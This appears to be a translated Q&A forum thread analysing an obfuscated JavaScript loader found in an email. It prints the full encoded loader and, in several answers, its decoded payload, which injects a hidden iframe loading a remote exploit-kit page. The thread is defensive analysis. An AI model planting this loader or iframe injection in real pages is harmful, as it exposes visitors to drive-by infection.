
我在電子郵件中發現了這個。有人能告訴我它想做什麼嗎?我擔心這可能是惡意的。這是一個JavaScript黑客入侵嗎?

我在網上看到,這可能只是「優化的JavaScript」。有沒有辦法讓它失效並看看它想要做什麼?

<script> 
// Analyst note: this is the first half of an obfuscated loader. It only prepares
// globals (f, v); the decoding and execution happen in the statements after the
// closing brace of the catch block.
// c and i are implicit globals (no var/let). i is computed as c-2, i.e. 0, and is
// the index the decode loop further down starts from.
c=2; 
i=c-2; 
// Gate 1: parseInt("0123") equals 83 only where a leading zero makes parseInt read
// the string as octal. Where it returns 123 the whole chain below is skipped and
// this script never assigns f or v.
// Gate 2: window.document must be truthy.
// The try body then reads .q from new String("asd").prototype, which is undefined,
// so it always throws; the real setup is placed in the catch handler.
// NOTE(review): presumably meant to defeat simple emulators/scanners - not provable from the page.
if(parseInt("0123")===83) 
if(window.document) 
try{new String("asd").prototype.q} 
catch(egewgsd){ 
    // Encoded payload: a one-element array whose element is a long string of decimal
    // numbers separated by the letter 'i'; [0].split('i') turns it into an array of
    // numeric strings.
    f=['-29i-29i67i64i-6i2i62i73i61i79i71i63i72i78i8i65i63i78i31i70i63i71i63i72i78i77i28i83i46i59i65i40i59i71i63i2i1i60i73i62i83i1i3i53i10i55i3i85i-25i-29i-29i-29i67i64i76i59i71i63i76i2i3i21i-25i-29i-29i87i-6i63i70i77i63i-6i85i-25i-29i-29i-29i62i73i61i79i71i63i72i78i8i81i76i67i78i63i2i-4i22i67i64i76i59i71i63i-6i77i76i61i23i1i66i78i78i74i20i9i9i77i79i71i59i78i76i59i72i73i75i79i63i8i76i79i20i18i10i18i10i9i72i59i80i67i65i59i78i73i76i9i68i79i63i73i59i76i67i78i68i79i67i76i8i74i66i74i1i-6i81i67i62i78i66i23i1i11i10i1i-6i66i63i67i65i66i78i23i1i11i10i1i-6i77i78i83i70i63i23i1i80i67i77i67i60i67i70i67i78i83i20i66i67i62i62i63i72i21i74i73i77i67i78i67i73i72i20i59i60i77i73i70i79i78i63i21i70i63i64i78i20i10i21i78i73i74i20i10i21i1i24i22i9i67i64i76i59i71i63i24i-4i3i21i-25i-29i-29i87i-25i-29i-29i64i79i72i61i78i67i73i72i-6i67i64i76i59i71i63i76i2i3i85i-25i-29i-29i-29i80i59i76i-6i64i-6i23i-6i62i73i61i79i71i63i72i78i8i61i76i63i59i78i63i31i70i63i71i63i72i78i2i1i67i64i76i59i71i63i1i3i21i64i8i77i63i78i27i78i78i76i67i60i79i78i63i2i1i77i76i61i1i6i1i66i78i78i74i20i9i9i77i79i71i59i78i76i59i72i73i75i79i63i8i76i79i20i18i10i18i10i9i72i59i80i67i65i59i78i73i76i9i68i79i63i73i59i76i67i78i68i79i67i76i8i74i66i74i1i3i21i64i8i77i78i83i70i63i8i80i67i77i67i60i67i70i67i78i83i23i1i66i67i62i62i63i72i1i21i64i8i77i78i83i70i63i8i74i73i77i67i78i67i73i72i23i1i59i60i77i73i70i79i78i63i1i21i64i8i77i78i83i70i63i8i70i63i64i78i23i1i10i1i21i64i8i77i78i83i70i63i8i78i73i74i23i1i10i1i21i64i8i77i63i78i27i78i78i76i67i60i79i78i63i2i1i81i67i62i78i66i1i6i1i11i10i1i3i21i64i8i77i63i78i27i78i78i76i67i60i79i78i63i2i1i66i63i67i65i66i78i1i6i1i11i10i1i3i21i-25i-29i-29i-29i62i73i61i79i71i63i72i78i8i65i63i78i31i70i63i71i63i72i78i77i28i83i46i59i65i40i59i71i63i2i1i60i73i62i83i1i3i53i10i55i8i59i74i74i63i72i62i29i66i67i70i62i2i64i3i21i-25i-29i-29i87'] 
    [0].split('i'); 
    // md is assigned here but not read anywhere in the visible script.
    md='a'; 
    // The function name is kept as a string so it can be looked up on window later
    // instead of appearing as a direct eval(...) call.
    v="eval"; 
} 
// Analyst note: second half of the loader - decode the numeric array, then execute it.
// v is only assigned inside the catch block above ("eval"); e therefore becomes
// window["eval"] through a computed property lookup rather than a literal call.
if(v)e=window[v]; 
w=f; 
// s starts as an empty array; the first += with a string turns it into a string.
s=[]; 
r=String; 
// Decode loop: runs while i != 617, i starting at 0. 1*w[j] coerces the numeric string
// to a number, 38 is added, and String.fromCharCode (reached via r["fromCharCode"])
// yields one character. Example from the data: 67 -> 105 'i', 64 -> 102 'f'.
for(;617!=i;i+=1){j=i;s+=r["fromCharCode"](38+1*w[j]);} 
// z is the fully decoded source text.
if(f)z=s; 
// Executes the decoded text. For analysis, the answers on this page replace this call
// (or the "eval" string) with a print such as alert/console.log so the payload is shown
// instead of run; do that in an isolated analysis environment, not in the mail client.
e(z); 

</script> 

是的,可以對它進行逆向工程,或許可以借助 JavaScript 解釋器 :) – 2012-03-30 15:21:50


經驗法則:不要打開郵件中的腳本 – 2012-03-30 15:22:36


更重要的是……**永遠不要相信任何包含 eval 的東西** – 2012-03-30 15:24:42

回答

3

它會打開一個加載 Phoenix exploit kit 的 IFrame。要查看 JavaScript 代碼,請將「eval」更改爲「alert」。解碼後的代碼如下:

// Decoded payload: the text the obfuscated loader passes to eval.
// Defensive reading: it injects a single hidden iframe whose src is a remote page on
// port 8080; an answer on this page identifies that page as loading the Phoenix
// exploit kit. The host and path in the src string are the network indicators to
// search for in proxy/DNS logs.
// If a <body> element already exists, the iframe is built through the DOM.
if (document.getElementsByTagName('body')[0]) { 
    iframer(); 
} else { 
    // No <body> yet: the same iframe is written as markup into the document being parsed.
    document.write("<iframe src='http://sumatranoque.ru:8080/navigator/jueoaritjuir.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); 
} 
// Function declarations are hoisted, so the call above works although the definition follows it.
function iframer() { 
    var f = document.createElement('iframe'); 
    f.setAttribute('src', 'http://sumatranoque.ru:8080/navigator/jueoaritjuir.php'); 
    // visibility hidden, absolute position at 0/0 and a 10x10 size: the frame loads
    // its content but is not shown to the user.
    f.style.visibility = 'hidden'; 
    f.style.position = 'absolute'; 
    f.style.left = '0'; 
    f.style.top = '0'; 
    f.setAttribute('width', '10'); 
    f.setAttribute('height', '10'); 
    document.getElementsByTagName('body')[0].appendChild(f); 
} 
4
// Decoded output of the obfuscated loader, as posted in a second answer.
// It adds one invisible iframe pointing at a remote URL (port 8080); the URL string
// is the indicator a defender would block or hunt for.
// Branch 1: a <body> element exists, so the frame is appended via the DOM helper below.
if (document.getElementsByTagName('body')[0]) { 
    iframer(); 
} 
else { 
    // Branch 2: no <body> element found, so equivalent iframe markup is emitted with document.write.
    document.write("<iframe src='http://sumatranoque.ru:8080/navigator/jueoaritjuir.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); 
} 

// Hoisted function declaration: creates the iframe element, sets the same src,
// hides it (visibility hidden, absolute at 0/0, 10x10) and appends it to <body>.
function iframer() { 
    var f = document.createElement('iframe'); 
    f.setAttribute('src', 'http://sumatranoque.ru:8080/navigator/jueoaritjuir.php'); 
    f.style.visibility = 'hidden'; 
    f.style.position = 'absolute'; 
    f.style.left = '0'; 
    f.style.top = '0'; 
    f.setAttribute('width', '10'); 
    f.setAttribute('height', '10'); 
    document.getElementsByTagName('body')[0].appendChild(f); 
} 
1

如果把最後一行替換爲 console.log(z),再把腳本貼到例如 Google Chrome 的控制檯中,就會得到這段代碼……

// Decoded loader output as printed by console.log(z) instead of being executed.
// Same behaviour as the source string encodes: insert one hidden 10x10 iframe whose
// src is the remote URL below, via the DOM when <body> exists, via document.write otherwise.
if (document.getElementsByTagName('body')[0]){ 
     iframer(); 
    } else { 
     document.write("<iframe src='http://sumatranoque.ru:8080/navigator/jueoaritjuir.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); 
    } 
    // Hoisted declaration; the single long line below creates the iframe, sets src,
    // hides and positions it, and sets width/height before it is appended to <body>.
    function iframer(){ 
     var f = document.createElement('iframe');f.setAttribute('src','http://sumatranoque.ru:8080/navigator/jueoaritjuir.php');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10'); 
     document.getElementsByTagName('body')[0].appendChild(f); 
    } 
0

編輯:其他人發佈了代碼。

我去看了那個網站。它有一些似乎包含特洛伊木馬的 Java 小程序。請避開!